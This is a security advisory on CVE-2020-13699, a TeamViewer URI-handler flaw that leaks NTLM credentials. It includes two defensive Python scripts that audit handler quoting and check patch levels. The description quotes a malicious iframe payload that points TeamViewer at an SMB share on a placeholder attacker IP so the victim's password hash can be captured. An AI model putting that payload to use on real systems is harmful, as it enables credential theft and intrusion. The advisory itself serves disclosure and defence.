Threat Alert

by IthacaLabs™

THREAT LEVEL: High    10/08/2020

New TeamViewer Flaw Allows Attackers To Steal System Password Remotely

Threat Level Description

Threat Level: High - An attack is highly likely. Additional and sustainable protective security measures are warranted, reflecting the broad nature of the threat combined with specific business and geographical vulnerabilities and judgments on acceptable risk.

Description

We have observed that a new high-risk vulnerability affecting the TeamViewer remote access software has been identified.

This flaw (CVE-2020-13699) resides in the way TeamViewer quotes its custom URI handlers, which could allow an attacker to force the software to relay an NTLM authentication request to the attacker's system. A remote, unauthenticated attacker exploiting this vulnerability could obtain the system's password and eventually compromise the system.

Note that the attack can be executed almost automatically, just by convincing the victim to visit a malicious web page once.

In order to successfully exploit the vulnerability, a malicious actor needs to embed a malicious iframe on a website (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') and then trick victims into visiting that maliciously crafted URL. Once clicked by the victim, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.

When opening the SMB share, the victim's system will perform an NTLM authentication, and that request can be relayed by the attacker for code execution or captured for hash cracking.

The flaw can be initiated remotely, requires no previous authentication and seems ideal for targeted watering hole attacks.

Though the vulnerability is not being exploited in the wild as of now, considering the popularity of the software among millions of users, TeamViewer has always been a target of interest for attackers.
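The quoting weakness described above can be checked for on an endpoint without exercising it. The following is an added example written for this alert, not code from IthacaLabs or TeamViewer: it inspects the shell\open\command template registered for each TeamViewer URI scheme named in the CVE description and reports any template whose %1 placeholder is left unquoted. The sample templates are constructed, the registry path follows the standard Windows layout for URL protocol handlers, and treating an unquoted %1 as the indicator is an assumption drawn from the page's own description of the flaw rather than something the alert spells out.

```python
"""Audit URI-scheme handler templates for an unquoted %1 placeholder.

Added example for this alert (not IthacaLabs' or TeamViewer's code).
"""
import re
import sys

# Schemes named in the CVE-2020-13699 description.
TEAMVIEWER_SCHEMES = (
    "teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1", "tvcontrol1",
    "tvfiletransfer1", "tvjoinv8", "tvpresent1", "tvsendfile1",
    "tvsqcustomer1", "tvsqsupport1", "tvvideocall1", "tvvpn1",
)

# Constructed sample command templates, not copied from an installation.
# Windows replaces %1 with the full URL before starting the program; whether
# the placeholder is quoted decides if the URL reaches the program as one
# argument or is split on spaces into several.
SAMPLE_TEMPLATES = {
    "unquoted": r'"C:\Program Files\TeamViewer\TeamViewer.exe" %1',
    "quoted": r'"C:\Program Files\TeamViewer\TeamViewer.exe" "%1"',
}


def argument_is_quoted(command_template: str) -> bool:
    """Return True if every %1 in the template sits inside double quotes.

    A placeholder counts as quoted when an odd number of '"' characters
    precede it (assumption: templates use plain double quotes, which is the
    convention for shell\\open\\command values).
    """
    for match in re.finditer(r"%1", command_template):
        quotes_before = command_template[: match.start()].count('"')
        if quotes_before % 2 == 0:
            return False
    return True


def audit_registry(schemes=TEAMVIEWER_SCHEMES) -> dict:
    """Look up HKEY_CLASSES_ROOT\\<scheme>\\shell\\open\\command per scheme.

    Returns {scheme: {"command": template, "quoted": bool}} for the schemes
    that are registered. Only runs on Windows; elsewhere it returns {}.
    """
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only module

    findings = {}
    for scheme in schemes:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                rf"{scheme}\shell\open\command") as key:
                template, _ = winreg.QueryValueEx(key, "")  # default value
        except OSError:
            continue  # scheme not registered on this host
        findings[scheme] = {"command": template,
                            "quoted": argument_is_quoted(template)}
    return findings


def unquoted_schemes(findings: dict) -> list:
    """Names of registered schemes whose template leaves %1 unquoted."""
    return sorted(s for s, f in findings.items() if not f["quoted"])


if __name__ == "__main__":
    for label, template in SAMPLE_TEMPLATES.items():
        print(f"{label:9s} quoted={argument_is_quoted(template)}  {template}")
    live = audit_registry()
    if live:
        print("registered TeamViewer schemes:", ", ".join(sorted(live)))
        print("schemes with unquoted %1:", unquoted_schemes(live) or "none")
```

Run it on a Windows host as a normal user; the registry keys are readable without elevation. A scheme that is registered with an unquoted placeholder is worth a ticket regardless of the version string, since the template is what decides how the URL is passed.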

CVE(s)

CVE-2020-13699

BASE SCORE: 6.8 Medium (CVSS v2)
VECTOR: (AV:N/AC:M/Au:N/C:P/I:P/A:P)

TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

Affected Systems

  • TeamViewer for Windows < 15.8.3

Recommendation(s)

You should immediately update to the latest version of TeamViewer.

You should understand the importance of security updates, and the urgency with which they should be applied, no matter how large or small your organization is. It is very important to apply an efficient patch management solution, to always have active security event logging enabled, and to practise event monitoring. Protecting the valuable assets of your business and complying with the relevant industry regulations requires a comprehensive approach to the management of risk, including Penetration Testing at least annually and upon significant changes.
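To turn the fixed-build list from the CVE description into a fleet check, the following added example (not IthacaLabs' or TeamViewer's code) compares a reported TeamViewer version against those builds. The inventory rows are constructed, and the branch rule (a build counts as patched only when it is at least the fixed build of its own major.minor branch, or sits on a branch or major newer than every fixed one) is an assumption of this example, not something the alert states.

```python
"""Compare installed TeamViewer builds against the fixed builds for CVE-2020-13699.

Added example for this alert (not IthacaLabs' or TeamViewer's code).
"""
from typing import Iterable, List, Tuple

# Fixed builds exactly as listed in the CVE description.
FIXED_VERSIONS = (
    "8.0.258861", "9.0.258860", "10.0.258873", "11.0.258870", "12.0.258869",
    "13.2.36220", "14.2.56676", "14.7.48350", "15.8.3",
)

# Constructed inventory (hostname, reported TeamViewer version); not real hosts.
INVENTORY = [
    ("ws-01", "15.8.3"),
    ("ws-02", "15.7.6"),
    ("ws-03", "14.5.1"),
    ("ws-04", "15.9.0"),
    ("srv-01", "13.2.36220"),
    ("srv-02", "10.0.258872"),
]


def parse_version(text: str) -> Tuple[int, ...]:
    """'15.8.3' -> (15, 8, 3); padded to three components so tuples compare
    component-wise and the major/minor fields always exist."""
    parts = [int(part) for part in text.strip().split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts)


def is_patched(installed: str, fixed: Iterable[str] = FIXED_VERSIONS) -> bool:
    """Assumed policy: patched when >= the fixed build of the same major.minor
    branch, or on a minor branch newer than every fixed branch of that major,
    or on a major newer than any listed. Older majors and unlisted in-between
    branches (for example 14.5) have no fixed build and count as vulnerable."""
    v = parse_version(installed)
    fixed_tuples = [parse_version(f) for f in fixed]
    same_major = [f for f in fixed_tuples if f[0] == v[0]]
    if not same_major:
        return v[0] > max(f[0] for f in fixed_tuples)
    for f in same_major:
        if f[1] == v[1]:
            return v >= f
    return v[1] > max(f[1] for f in same_major)


def hosts_needing_update(inventory) -> List[str]:
    """Hostnames whose build is not covered by a fixed build."""
    return [host for host, version in inventory if not is_patched(version)]


if __name__ == "__main__":
    for host, version in INVENTORY:
        status = "ok" if is_patched(version) else "UPDATE"
        print(f"{host:7s} {version:12s} {status}")
    print("needs update:", hosts_needing_update(INVENTORY))
```

Feed it the version strings your inventory or RMM tool already collects for TeamViewer.exe; hosts on a 14.x branch between the two fixed 14 builds are the ones most easily missed by a plain "is it below 15.8.3" query.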

References
